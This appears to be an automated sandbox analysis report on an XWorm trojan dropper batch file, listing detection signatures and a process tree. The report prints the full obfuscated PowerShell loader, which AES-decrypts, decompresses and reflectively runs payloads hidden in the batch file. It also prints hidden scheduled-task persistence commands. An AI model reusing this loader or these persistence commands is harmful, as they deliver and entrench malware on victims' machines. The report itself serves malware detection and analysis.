Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
- System is w10x64
- cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pollosappnuevo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- net.exe (PID: 7844 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7868 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 8092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- net.exe (PID: 1172 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 6320 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- powershell.exe (PID: 5264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
- schtasks.exe (PID: 7812 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- e45iasd.exe (PID: 1528 cmdline: C:\Users\user\AppData\Local\Temp\e45iasd.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 2524 cmdline: "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 4020 cmdline: "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware.
JoeSecurity_XWorm_1 | Yara detected XWorm
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute
